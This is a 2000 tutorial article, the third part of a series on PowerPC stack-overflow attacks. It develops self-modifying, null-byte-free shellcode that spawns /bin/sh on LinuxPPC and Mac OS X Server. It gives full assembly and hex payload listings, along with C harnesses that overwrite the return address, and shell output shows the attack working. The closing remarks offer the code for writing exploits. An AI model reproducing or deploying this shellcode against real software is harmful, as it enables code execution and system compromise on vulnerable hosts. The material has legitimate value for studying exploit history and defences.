PowerPC Stack Attacks, Part 3 - June 5, 2000
Christopher A Shepherd <cshepher@linux-florida.com>

In the last installment, we got pretty close, developing our own eggshell code, with one lil problem! It had zeroes in it. Of course, strcpy(), gets(), and all our other favorite insecure functions are going to choke on those zeroes, so we must do what we can do to get around having zeroes in our code. The horrifying explanation follows here.

First, a look at the original code:
100003e4:       48 00 00 30     b       10000414 <.ahead>
100003e8 <.back>:
100003e8:       7c 08 02 a6     mflr    r0
100003ec:       7c 01 03 78     mr      r1,r0
100003f0:       90 01 00 08     stw     r0,8(r1)
100003f4:       7c 03 03 78     mr      r3,r0
100003f8:       38 81 00 08     addi    r4,r1,8
100003fc:       38 a0 00 00     li      r5,0
10000400:       90 a1 00 0c     stw     r5,12(r1)
10000404:       38 00 00 0b     li      r0,11
10000408:       44 00 00 02     sc
1000040c:       38 00 00 01     li      r0,1
10000410:       44 00 00 02     sc
10000414 <.ahead>:
10000414:       4b ff ff d5     bl      100003e8 <.back>

How simple, how compact, how very few bytes. But look at how it works.

First, it does an unconditional branch, followed by a bl to discover the address of the string. Problem is, the 0x30 offset is encoded as '0x000030', which leaves us a few zeroes. Fortunately, we don't even need to do things that way. We were blr'ed to, and blr doesn't clear the link register, meaning that LR contains our address! All we have to do now is add the offset of the string to get its address. Witness:
                mflr    0       # r1 = .ourstrt since we were blr'ed to
                mr      1,0

Ahh, so easy. But look! The li's, the stw's, and the sc's all contain zeroes too! So how do we implement an li? We have to do this:
		li	9,0x104
		addic	9,9,-0x103

This would store the value '1' in register r9, without having zeroes in any instruction. We end up doing this quite a bit. And the stw's get dealt with by using negative offsets as well.

But the big problem is the 'sc.' There is no way to generate that particular interrupt without that instruction. So we must use self-modifying code.

The resulting assembly-bloat is this:
/*
 *  Final LinuxPPC eggcode
 *  Christopher A Shepherd
 *
 *  Zero-byte-free version of the eggshell code, written as inline
 *  assembly so the assembler can resolve the label distances.
 *
 *  Flow of the assembly below:
 *    - LR is assumed to hold the address of .ourstrt (the code is reached
 *      through a blr); it is copied into r1 by way of r0.
 *    - r9  = 0x4401 - 1     = 0x4400
 *      r10 = 0x0104 - 0x102 = 0x0002
 *      These are the upper and lower halfwords of the sc opcode
 *      (44 00 00 02).  The inline notes on those two addic lines say
 *      "r8" and "r9"; the instructions actually target r9 and r10.
 *    - r2 is pointed 0x104 bytes past .sc1 and the two sth's store with
 *      displacements -0x104 / -0x102, overwriting the placeholder at .sc1
 *      with the sc opcode.  The same is repeated for .sc2.  The bias keeps
 *      zero bytes out of the immediates and displacements.
 *    - r1 is advanced to .ourdat (add 0x101 + distance, then subtract 0x101).
 *    - The string's address is stored at .ourdat+8 and a zero word at
 *      .ourdat+12, using r8 = r1 + 257 with displacements -249 / -245.
 *    - r3 = address of the string, r4 = .ourdat+8, r5 = 0.
 *    - r0 = 0x10c - 0x101 = 11 before the first patched sc;
 *      r0 = 0x102 - 0x101 = 1  before the second.
 *
 *  The "xor 7,7,7" at .sc1 and .sc2 is only a zero-free placeholder that
 *  is replaced at run time by the stores described above.
 */

void main()
{
__asm__("
.ourstrt:
		mflr	0	# r1 = .ourstrt since we were blr'ed to
		mr	1,0
		li	9,0x4401
		addic	9,9,-1	# r8 = 0x4400
		li	10,0x0104
		addic	10,10,-0x102 # r9 = 0x0002
		addic	2,1,0x104+(.sc1-.ourstrt)
		sth	9,-0x104(2)
		sth	10,-0x102(2)		# write .sc1
		addic	2,1,0x104+(.sc2-.ourstrt)
		sth	9,-0x104(2)
		sth	10,-0x102(2)		# write .sc2
		addic	1,1,0x101+(.ourdat-.ourstrt)
		addic	1,1,-0x101
		mr	0,1	# r0 = r1 = /bin/sh
		addic	8,1,257 # r8 = r1 + 257
		stw	0,-249(8)  # string+8 contains address of string now
		mr	3,0	# r3 = ptr to /bin/sh
		addic	4,1,0x109	# r4 = r1+8 = ptr to ptr
		addic	4,4,-0x101
		xor	5,5,5   # r5 = 0 = NULL
		xor	6,6,6   # r6 = 0 for traps
		addic	8,1,257
		stw	5,-245(8) # null ptr in space after ptr
		xor	7,7,7
		addic	7,7,0x10c
		addic	7,7,-0x101
		mr	0,7
.sc1:		xor	7,7,7	# blah - zeroless placeholder
		xor	7,7,7
		addic	7,7,0x102
		addic	7,7,-0x101
		mr	0,7
.sc2:		xor	7,7,7	# blah - zeroless placeholder
.ourdat:
		.string	\"/bin/sh\"
");
}

... Which can compile into a nice neat little test program thus:
/*
 *  Complete LinuxPPC Buffer-Overflow Code
 *
 *  Christopher A Shepherd 
 *
 *  Hand-assembled form of the zero-free eggcode.  Each entry is one
 *  4-byte instruction; the number at the end of each comment is that
 *  instruction's byte offset from the start of the array.  No instruction
 *  contains a zero byte; the only zero is the string terminator.
 *
 *  The words at offsets 112 and 132 are placeholders (44 ff ff ff).  The
 *  sth pairs at 028/032 and 040/044 overwrite them with 44 00 00 02 (sc)
 *  at run time: 372 - 260 = 112 and 392 - 260 = 132.
 *
 *  NOTE(review): the stw's at 064 and 092 write to string+8 and string+12,
 *  i.e. offsets 144 and 148, which lie past the bytes declared here.
 */
 
char shellcode[] = 
	"\x7c\x08\x02\xa6"		/*	mflr	r0		000  r0 = LR */
	"\x7c\x01\x03\x78"		/*	mr	r1,r0		004  r1 = start of this code */
	"\x39\x20\x44\x01"		/*	li	r9,17409	008  0x4401 */
	"\x31\x29\xff\xff"		/*	addic	r9,r9,-1	012  r9 = 0x4400 */
	"\x39\x40\x01\x04"		/*	li	r10,260		016  0x0104 */
	"\x31\x4a\xfe\xfe"		/*	addic	r10,r10,-258	020  r10 = 0x0002 */
	"\x30\x41\x01\x74"		/*	addic	r2,r1,372	024  r2 = offset 112 + 260 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	028  patch bytes 112-113 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	032  patch bytes 114-115 */
	"\x30\x41\x01\x88"		/*	addic	r2,r1,392	036  r2 = offset 132 + 260 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	040  patch bytes 132-133 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	044  patch bytes 134-135 */
	"\x30\x21\x01\x89"		/*	addic	r1,r1,393	048  136 + 257 */
	"\x30\x21\xfe\xff"		/*	addic	r1,r1,-257	052  r1 = offset 136 (string) */
	"\x7c\x20\x0b\x78"		/*	mr	r0,r1		056 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	060 */
	"\x90\x08\xff\x07"		/*	stw	r0,-249(r8)	064  string+8 = &string */
	"\x7c\x03\x03\x78"		/*	mr	r3,r0		068  r3 = &string */
	"\x30\x81\x01\x09"		/*	addic	r4,r1,265	072 */
	"\x30\x84\xfe\xff"		/*	addic	r4,r4,-257	076  r4 = string+8 */
	"\x7c\xa5\x2a\x78"		/*	xor	r5,r5,r5	080  r5 = 0 */
	"\x7c\xc6\x32\x78"		/*	xor	r6,r6,r6	084  r6 = 0 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	088 */
	"\x90\xa8\xff\x0b"		/*	stw	r5,-245(r8)	092  string+12 = 0 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	096 */
	"\x30\xe7\x01\x0c"		/*	addic	r7,r7,268	100 */
	"\x30\xe7\xfe\xff"		/*	addic	r7,r7,-257	104  r7 = 11 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		108  r0 = 11 */
	"\x44\xff\xff\xff"		/*	sc (placeholder)	112  patched to 44 00 00 02 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	116 */
	"\x30\xe7\x01\x02"		/*	addic	r7,r7,258	120 */
	"\x30\xe7\xfe\xff"		/*	addic	r7,r7,-257	124  r7 = 1 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		128  r0 = 1 */
	"\x44\xff\xff\xff"		/*	sc (placeholder)	132  patched to 44 00 00 02 */
	
	"\x2f\x62\x69\x6e\x2f\x73\x68\x00";	/*	/bin/sh \x00	136 */

/*
 * Test harness: overwrites one word of main()'s own stack frame with the
 * address of shellcode[] and then returns normally.
 */
void main() {
	int *ret;
	
	/* Address of the word 7 ints above 'ret' itself.  Per the article this
	 * offset depends on the stack frame the toolchain gives main();
	 * presumably it is the slot the return address is reloaded from. */
	ret = (int *)&ret + 7;
	/* Store the payload's address there (assumes a pointer fits in an int). */
	(*ret) = (int)shellcode;
	
	printf("Hi there.\n");
}

Whoa nellie! 144 bytes for a stack overflow! This is partially due to ppc's orthogonal 4-byte instructions, and partially due to the zeroes in the 'sc' instruction. It's a bitch, but I'm sure you could optimize it. It's not that well-done. It does however work in the above example. If your toolchain is like mine, and main() gets the same stack frame (and it should), you can compile and run this and get the same results as last time:
[cshepher@hal9000 egg]$ ./sploit2
Hi there.
sh-2.03$ 

Ahhh, but where do we go from here?

Where indeed. Let's talk about taking this to different PowerPC operating systems that deserve just as much scrutiny as LinuxPPC. Look at Mac OS X Server.

When I cc -S to compile this very same source listing to an assembler file on Mac OS X Server, I get:
_main:
        mflr r0
        stmw r30,-8(r1)
        stw r0,8(r1)
        stwu r1,-80(r1)
        mr r30,r1

Oh boy. 80-byte stack frame. That means we change "&ret + 7" to "&ret + 8" (yeah I know, the toolchain works differently here). Now when we compile it, we're rewarded with:
[11:50pm] 64 [~]:cshepher@bondi% ./sploit2
Hi there.
Bad system call

Oh yeah. Different system call structure. If we look at /usr/include/sys/syscall.h, note that it says
/* 11 is obsolete execv */

Sucks to be us. Looks like we want 59, execve(). Let's try it. We go back to the sploit and use:
	addic	r7,r7,316
	addic	r7,r7,-257

To make r7 contain our call number, 59.

Compile it, and we get:
[11:57pm] 86 [~]:cshepher@bondi% ./sploit2
Hi there.
$

Gee, that was tough. The code to that looks like:
/*
 *  Complete Mac OS X Server Buffer-Overflow Code
 *
 *  Christopher A Shepherd 
 *
 *  Same payload as the LinuxPPC listing except for the immediate at
 *  offset 100: 316 - 257 = 59, the call number the article selects for
 *  execve() on this system.  Each entry is one 4-byte instruction; the
 *  number at the end of each comment is its byte offset from the start
 *  of the array.
 *
 *  The words at offsets 112 and 132 are placeholders (44 ff ff ff).  The
 *  sth pairs at 028/032 and 040/044 overwrite them with 44 00 00 02 (sc)
 *  at run time: 372 - 260 = 112 and 392 - 260 = 132.
 *
 *  NOTE(review): the stw's at 064 and 092 write to string+8 and string+12,
 *  i.e. offsets 144 and 148, which lie past the bytes declared here.
 */
 
char shellcode[] = 
	"\x7c\x08\x02\xa6"		/*	mflr	r0		000  r0 = LR */
	"\x7c\x01\x03\x78"		/*	mr	r1,r0		004  r1 = start of this code */
	"\x39\x20\x44\x01"		/*	li	r9,17409	008  0x4401 */
	"\x31\x29\xff\xff"		/*	addic	r9,r9,-1	012  r9 = 0x4400 */
	"\x39\x40\x01\x04"		/*	li	r10,260		016  0x0104 */
	"\x31\x4a\xfe\xfe"		/*	addic	r10,r10,-258	020  r10 = 0x0002 */
	"\x30\x41\x01\x74"		/*	addic	r2,r1,372	024  r2 = offset 112 + 260 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	028  patch bytes 112-113 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	032  patch bytes 114-115 */
	"\x30\x41\x01\x88"		/*	addic	r2,r1,392	036  r2 = offset 132 + 260 */
	"\xb1\x22\xfe\xfc"		/*	sth	r9,-260(r2)	040  patch bytes 132-133 */
	"\xb1\x42\xfe\xfe"		/*	sth	r10,-258(r2)	044  patch bytes 134-135 */
	"\x30\x21\x01\x89"		/*	addic	r1,r1,393	048  136 + 257 */
	"\x30\x21\xfe\xff"		/*	addic	r1,r1,-257	052  r1 = offset 136 (string) */
	"\x7c\x20\x0b\x78"		/*	mr	r0,r1		056 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	060 */
	"\x90\x08\xff\x07"		/*	stw	r0,-249(r8)	064  string+8 = &string */
	"\x7c\x03\x03\x78"		/*	mr	r3,r0		068  r3 = &string */
	"\x30\x81\x01\x09"		/*	addic	r4,r1,265	072 */
	"\x30\x84\xfe\xff"		/*	addic	r4,r4,-257	076  r4 = string+8 */
	"\x7c\xa5\x2a\x78"		/*	xor	r5,r5,r5	080  r5 = 0 */
	"\x7c\xc6\x32\x78"		/*	xor	r6,r6,r6	084  r6 = 0 */
	"\x31\x01\x01\x01"		/*	addic	r8,r1,257	088 */
	"\x90\xa8\xff\x0b"		/*	stw	r5,-245(r8)	092  string+12 = 0 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	096 */
	"\x30\xe7\x01\x3c"		/*	addic	r7,r7,316	100 */
	"\x30\xe7\xfe\xff"		/*	addic	r7,r7,-257	104  r7 = 59 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		108  r0 = 59 */
	"\x44\xff\xff\xff"		/*	sc (placeholder)	112  patched to 44 00 00 02 */
	"\x7c\xe7\x3a\x78"		/*	xor	r7,r7,r7	116 */
	"\x30\xe7\x01\x02"		/*	addic	r7,r7,258	120 */
	"\x30\xe7\xfe\xff"		/*	addic	r7,r7,-257	124  r7 = 1 */
	"\x7c\xe0\x3b\x78"		/*	mr	r0,r7		128  r0 = 1 */
	"\x44\xff\xff\xff"		/*	sc (placeholder)	132  patched to 44 00 00 02 */
	
	"\x2f\x62\x69\x6e\x2f\x73\x68\x00";	/*	/bin/sh \x00	136 */

/*
 * Test harness for the Mac OS X Server build: overwrites one word of
 * main()'s own stack frame with the address of shellcode[] and then
 * returns normally.
 */
void main() {
	int *ret;
	
	/* Address of the word 8 ints above 'ret' itself.  The article moves
	 * this from 7 to 8 because this compiler sets up an 80-byte frame;
	 * presumably it is the slot the return address is reloaded from. */
	ret = (int *)&ret + 8;
	/* Store the payload's address there (assumes a pointer fits in an int). */
	(*ret) = (int)shellcode;
	
	printf("Hi there.\n");
}

I'm not going to optimize the code here for you, but there sure as hell are a few places where you could save a few instructions in that shellcode. But I'm not going to do all that for you, just give you some working code. From here, you have everything you need to write k-rad spl0its for buffer overflows in these operating systems.

-Chris